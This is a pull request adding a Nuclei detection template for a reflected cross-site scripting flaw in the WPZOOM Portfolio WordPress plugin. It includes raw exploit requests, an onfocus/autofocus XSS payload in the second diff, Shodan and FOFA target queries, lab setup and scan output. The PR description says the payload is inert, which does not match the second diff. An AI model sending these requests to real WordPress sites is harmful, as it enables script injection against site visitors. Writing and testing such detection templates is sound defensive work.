### PR TITLE
Add CVE-2026-49069 WPZOOM Portfolio cross-site scripting

### DIFF
--- a/http/cves/2026/CVE-2026-49069.yaml
+++ b/http/cves/2026/CVE-2026-49069.yaml
@@ -1,0 +1,66 @@
+id: CVE-2026-49069
+
+info:
+  name: WPZOOM Portfolio <= 1.4.21 - Cross-Site Scripting
+  author: aryu-ru
+  severity: high
+  description: |
+    WPZOOM Portfolio plugin for WordPress through 1.4.21 contains a reflected cross-site scripting vulnerability caused by the wpzoom_load_more_items AJAX action being registered for unauthenticated visitors without a nonce or capability check, letting attackers override the plugin's internal class value through the posts_data parameter and break out of the class attribute in the rendered markup, exploit requires no authentication.
+  impact: |
+    Unauthenticated attackers can inject arbitrary attributes and JavaScript into the reflected markup, enabling session theft, phishing, or actions performed in the context of a victim who loads the crafted request.
+  remediation: |
+    Update WPZOOM Portfolio to version 1.4.22 or later.
+  reference:
+    - https://patchstack.com/database/wordpress/plugin/wpzoom-portfolio/vulnerability/wordpress-wpzoom-portfolio-plugin-1-4-21-cross-site-scripting-xss-vulnerability?_s_id=cve
+    - https://www.exploit-db.com/exploits/52611
+    - https://wordpress.org/plugins/wpzoom-portfolio/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-49069
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
+    cvss-score: 7.1
+    cve-id: CVE-2026-49069
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: wpzoom
+    product: wpzoom-portfolio
+    framework: wordpress
+    shodan-query: http.html:"/wp-content/plugins/wpzoom-portfolio"
+    fofa-query: body="/wp-content/plugins/wpzoom-portfolio"
+    publicwww-query: "/wp-content/plugins/wpzoom-portfolio/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,wpzoom,xss,unauth
+
+variables:
+  marker: "{{randstr}}"
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22post%22%2C%22class%22%3A%22{{marker}}%27%20data-{{marker}}%3D%271%22%7D
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22portfolio_item%22%2C%22class%22%3A%22{{marker}}%27%20data-{{marker}}%3D%271%22%7D
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "wpzoom-ajax-portfolio-items"
+          - "<li class='{{marker}}' data-{{marker}}='1_item"
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-49069.yaml
+++ b/http/cves/2026/CVE-2026-49069.yaml
@@ -1,19 +1,18 @@
 id: CVE-2026-49069
 
 info:
-  name: WPZOOM Portfolio <= 1.4.21 - Cross-Site Scripting
+  name: WPZOOM Portfolio <= 1.4.21 - Reflected Cross-Site Scripting
   author: aryu-ru
   severity: high
   description: |
-    WPZOOM Portfolio plugin for WordPress through 1.4.21 contains a reflected cross-site scripting vulnerability caused by the wpzoom_load_more_items AJAX action being registered for unauthenticated visitors without a nonce or capability check, letting attackers override the plugin's internal class value through the posts_data parameter and break out of the class attribute in the rendered markup, exploit requires no authentication.
+    WPZOOM Portfolio <= 1.4.21 contains a reflected XSS caused by improper neutralization of input during web page generation, letting attackers execute scripts in victim's browser, exploit requires crafted request.
   impact: |
-    Unauthenticated attackers can inject arbitrary attributes and JavaScript into the reflected markup, enabling session theft, phishing, or actions performed in the context of a victim who loads the crafted request.
+    Attackers can execute scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.
   remediation: |
-    Update WPZOOM Portfolio to version 1.4.22 or later.
+    Update to the latest version of WPZOOM Portfolio.
   reference:
     - https://patchstack.com/database/wordpress/plugin/wpzoom-portfolio/vulnerability/wordpress-wpzoom-portfolio-plugin-1-4-21-cross-site-scripting-xss-vulnerability?_s_id=cve
     - https://www.exploit-db.com/exploits/52611
-    - https://wordpress.org/plugins/wpzoom-portfolio/
     - https://nvd.nist.gov/vuln/detail/CVE-2026-49069
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
@@ -22,45 +21,63 @@ info:
     cwe-id: CWE-79
   metadata:
     verified: true
-    max-request: 2
+    max-request: 3
     vendor: wpzoom
     product: wpzoom-portfolio
-    framework: wordpress
     shodan-query: http.html:"/wp-content/plugins/wpzoom-portfolio"
     fofa-query: body="/wp-content/plugins/wpzoom-portfolio"
-    publicwww-query: "/wp-content/plugins/wpzoom-portfolio/"
   tags: cve,cve2026,wordpress,wp,wp-plugin,wpzoom,xss,unauth
 
 variables:
   marker: "{{randstr}}"
 
+flow: http(1) && (http(2) || http(3))
+
 http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 3
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "wpzoom-portfolio")
+          - status_code == 200
+        condition: and
+        internal: true
+
   - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22post%22%2C%22class%22%3A%22{{marker}}%27%20data-{{marker}}%3D%271%22%7D
+        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22post%22%2C%22class%22%3A%22{{marker}}%27%20onfocus%3D%27alert(document.domain)%27%20autofocus%3D%27%22%7D
 
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "onfocus='alert(document.domain)'"
+          - "wpzoom-ajax-portfolio-items"
+        condition: and
+
+  - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22portfolio_item%22%2C%22class%22%3A%22{{marker}}%27%20data-{{marker}}%3D%271%22%7D
+        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22portfolio_item%22%2C%22class%22%3A%22{{marker}}%27%20onfocus%3D%27alert(document.domain)%27%20autofocus%3D%27%22%7D
 
-    stop-at-first-match: true
-
-    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
+          - "onfocus='alert(document.domain)'"
           - "wpzoom-ajax-portfolio-items"
-          - "<li class='{{marker}}' data-{{marker}}='1_item"
         condition: and
-
-      - type: status
-        status:
-          - 200


### PR DESCRIPTION
### PR Information

Added `http/cves/2026/CVE-2026-49069.yaml` for WPZOOM Portfolio `<= 1.4.21` reflected cross-site scripting.

The plugin registers `wpzoom_load_more_items` on the `wp_ajax_nopriv_` hook (`build/blocks/portfolio/index.php` L338) with no nonce and no capability check. `load_more_items()` JSON-decodes `$_POST['posts_data']` and `wp_parse_args()` merges the attacker-supplied `class` key over the plugin default, then `items_html()` interpolates `{$class}` raw into fifteen single-quoted HTML attributes with no `esc_attr()` (L940, L944, L955, L964, L969, L970, L979, L1001, L1005, L1011, L1022, L1034, L1048, L1058). A single unauthenticated POST to `/wp-admin/admin-ajax.php` therefore closes the `class` attribute and injects a new attribute into the reflected markup.

The template sends a randomly-named, inert `data-*` attribute rather than an event handler, so nothing executes in a victim browser while attribute-context breakout is still proven. The request is read-only: the handler runs a `WP_Query` and echoes markup; there is no write, no state change and no nonce consumption, so the template is not `intrusive`.

Two requests are sent with `stop-at-first-match: true`: `source=post` first, falling back to `source=portfolio_item`. Every injection sink sits inside `if ( $query->have_posts() )`, so the fallback covers portfolio-only sites that have no published regular posts.

- Added CVE-2026-49069
- References:
  - https://patchstack.com/database/wordpress/plugin/wpzoom-portfolio/vulnerability/wordpress-wpzoom-portfolio-plugin-1-4-21-cross-site-scripting-xss-vulnerability?_s_id=cve
  - https://www.exploit-db.com/exploits/52611 (EDB-ID 52611, Kent Apostol, 2026-06-10)
  - https://nvd.nist.gov/vuln/detail/CVE-2026-49069

**Classification:** CWE-79 · `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L` · 7.1 (HIGH) · vendor `wpzoom` · product `wpzoom-portfolio`.

Fixed in **1.4.22**, not 1.4.31. I diffed all three builds. 1.4.21 L353 is a bare `unset( $data['total'] );`; 1.4.22 L358 already carries `if ( is_array( $data ) ) { unset( $data['total'], $data['class'] ); } else { $data = array(); }`, preceded by the vendor's own comment naming the bug: *"This prevents reflected XSS via the `class` key"*.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

**Lab (public images only, ~3 minutes):**

```bash
docker network create wpznet
docker run -d --name wpz-db --network wpznet \
  -e MYSQL_ROOT_PASSWORD=root -e MYSQL_DATABASE=wp -e MYSQL_USER=wp -e MYSQL_PASSWORD=wp mysql:8
docker run -d --name wpz-wp --network wpznet -p 8099:80 \
  -e WORDPRESS_DB_HOST=wpz-db -e WORDPRESS_DB_USER=wp -e WORDPRESS_DB_PASSWORD=wp -e WORDPRESS_DB_NAME=wp \
  wordpress:latest
# complete the WordPress installer, then:
curl -o wpz.zip https://downloads.wordpress.org/plugin/wpzoom-portfolio.1.4.21.zip
docker cp wpz.zip wpz-wp:/var/www/html/wpz.zip
docker run --rm --network wpznet --volumes-from wpz-wp -u 33:33 \
  -e WORDPRESS_DB_HOST=wpz-db -e WORDPRESS_DB_USER=wp -e WORDPRESS_DB_PASSWORD=wp -e WORDPRESS_DB_NAME=wp \
  wordpress:cli plugin install /var/www/html/wpz.zip --activate
```

**True positive, `nuclei -debug` against 1.4.21:**

```
[INF] [CVE-2026-49069] Dumped HTTP request for http://127.0.0.1:8099/wp-admin/admin-ajax.php
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8099
Content-Type: application/x-www-form-urlencoded

action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22post%22%2C%22class%22%3A%223I7yDtNkCcl613ArSmmQEuBtIdH%27%20data-3I7yDtNkCcl613ArSmmQEuBtIdH%3D%271%22%7D

[DBG] [CVE-2026-49069] Dumped HTTP response http://127.0.0.1:8099/wp-admin/admin-ajax.php
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.4.68 (Debian)
X-Powered-By: PHP/8.3.33

<div class="wpzoom-ajax-portfolio-items"><li class='3I7yDtNkCcl613ArSmmQEuBtIdH' data-3I7yDtNkCcl613ArSmmQEuBtIdH='1_item 3I7yDtNkCcl613ArSmmQEuBtIdH' data-3I7yDtNkCcl613ArSmmQEuBtIdH='1_item-1 3I7yDtNkCcl613ArSmmQEuBtIdH' data-3I7yDtNkCcl613ArSmmQEuBtIdH='1_category-1'  data-category='1'><article class='3I7yDtNkCcl613ArSmmQEuBtIdH' data-3I7yDtNkCcl613ArSmmQEuBtIdH='1_item-wrap portfolio_item'>...</li></div>

[CVE-2026-49069:word-1] [http] [high] http://127.0.0.1:8099/wp-admin/admin-ajax.php
[CVE-2026-49069:status-2] [http] [high] http://127.0.0.1:8099/wp-admin/admin-ajax.php
[INF] Scan completed in 18.814472ms. 2 matches found.
```

**False-positive checks, all silent:**

| Target | Response | Result |
|---|---|---|
| WPZOOM Portfolio **1.4.22** (patched), same host | `HTTP 200`, 487 B, handler fingerprint still present | **No match** |
| WPZOOM Portfolio 1.4.21, portfolio-only site (0 regular posts) | block 1 → `HTTP 200`, empty `<div>`; block 2 rescues | Match (fallback works) |
| Stock WordPress, plugin deactivated | `HTTP 400`, body `0` | **No match** |
| `http://honey.scanme.sh` (CI weak-matcher target) | echoes request, `HTTP 200` | **No match** |
| `https://scanme.sh` | n/a | **No match** |

The patched-version row is the important one: status, endpoint and the `wpzoom-ajax-portfolio-items` handler fingerprint are all *identical* between 1.4.21 and 1.4.22. The only discriminator is the attribute breakout, and it correctly stays silent.

The breakout string is not plain reflection: `_item` is the plugin's own suffix concatenated *after* the injected value (`items_html()` L940: `"<li class='{$class}_item ..."`), so an echo-everything host cannot forge it.

**Payload constraints** (from WP's `_sanitize_text_fields`, which the value passes through): `<` and `>` are stripped by `wp_strip_all_tags`, hence attribute breakout rather than `<script>`; `%[a-f0-9]{2}` sequences are deleted from the decoded value, so the marker must stay alphanumeric (`{{randstr}}` is); and `[\r\n\t ]+` collapses to one space, hence the single space in the payload.

**Novelty:** `grep -ril 'CVE-2026-49069' http/ network/ dns/ ssl/ file/ javascript/ code/ headless/ dast/ cloud/ cves.json` → no matches, and `load_more_items` appears nowhere in the tree. The only other `wpzoom` files are `http/cves/2024/CVE-2024-30464.yaml` (a *different* plugin: Social Icons Widget, CWE-862, authenticated flow) and the `wpzoom-portfolio` slug entry in `http/technologies/wordpress/plugins/wordpress-plugin-detect.yaml`, which is front-page fingerprinting only and cannot distinguish 1.4.21 from 1.4.22. No open or closed PR exists for this CVE.

**Reviewer considerations:**
- Detection under-reports on a site whose queried post type has zero published entries. The two-request fallback narrows this, but it cannot be closed entirely. It can only ever produce a false negative, never a false positive.
- ~20,000 active installs per the wordpress.org API.
- `epss-score` / `epss-percentile` omitted; happy to add them if you would rather they were set at merge time.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/main/CONTRIBUTING.md)
